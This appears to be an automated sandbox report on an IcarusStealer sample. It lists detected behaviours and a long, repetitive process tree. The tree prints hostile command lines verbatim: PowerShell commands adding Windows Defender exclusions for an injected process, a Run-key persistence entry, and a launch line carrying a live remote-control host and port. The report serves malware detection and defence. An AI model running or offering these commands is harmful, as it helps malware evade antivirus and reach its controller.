Analysis Overview
SHA256
b35787b524c38dc8470f490e07785e3d79529f30ea703e3eb998b95b53747f0b
Threat Level: Known bad
The file testiescals.exe was found to be: Known bad.
Malicious Activity Summary
IcarusStealer
Modifies Installed Components in the registry
Checks computer location settings
Executes dropped EXE
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-03-09 03:35
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-09 03:35
Reported
2024-03-09 03:38
Platform
win7-20240221-en
Max time kernel
146s
Max time network
120s
Command Line
Signatures
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "\"C:\\Users\\Admin\\AppData\\Roaming\\system.exe\"" | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
Network
Files
memory/2920-1-0x00000000745B0000-0x0000000074B5B000-memory.dmp
memory/2920-0-0x00000000745B0000-0x0000000074B5B000-memory.dmp
memory/2920-2-0x00000000023D0000-0x0000000002410000-memory.dmp
memory/2920-3-0x00000000023D0000-0x0000000002410000-memory.dmp
memory/2920-5-0x00000000745B0000-0x0000000074B5B000-memory.dmp
memory/2920-6-0x00000000023D0000-0x0000000002410000-memory.dmp
memory/2920-7-0x00000000023D0000-0x0000000002410000-memory.dmp
memory/2920-8-0x00000000023D0000-0x0000000002410000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-09 03:35
Reported
2024-03-09 03:38
Platform
win10v2004-20231215-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
IcarusStealer
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "\"C:\\Users\\Admin\\AppData\\Roaming\\system.exe\"" | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3248 set thread context of 3092 | N/A | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | C:\Users\Admin\AppData\Local\Temp\testiescals.exe |
| PID 464 set thread context of 2120 | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1497073144-2389943819-3385106915-1000\{AB178A99-891E-4794-8996-11841276B146} | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\as2cyhgw\as2cyhgw.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5ED9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCF986C6C26C944EEA912369597B75CD5.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ravpggri\ravpggri.cmdline"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES77A1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3FBA7B35E5B8406D8F98ECD3FFECA56.TMP"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j0ereory\j0ereory.cmdline"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES925D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3D3D89F7BFCB4355A916B74D2882012.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yelwxg3g\yelwxg3g.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA519.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2119989D5584FA29D37B37DD5B4C475.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xxdjkc4m\xxdjkc4m.cmdline"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB6DC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEDEF54CB7CF4460281B829BF5086FD17.TMP"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Users\Admin\AppData\Local\Temp\Start.exe
C:\Users\Admin\AppData\Local\Temp\Start.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dni4xc0s\dni4xc0s.cmdline"
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD5ED.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC209314B7ECA1444FB9AA8FCCB2D94937.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\apg4tez1\apg4tez1.cmdline"
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE659.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAE7821D14CC8464E9E952F37E51225F4.TMP"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r520vcon\r520vcon.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE36.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC3062CD289A34627AE1DABC3D54A6F3.TMP"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vmvbjdot\vmvbjdot.cmdline"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES143F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5C610EF6AA14F0EA875DCB60C590E.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
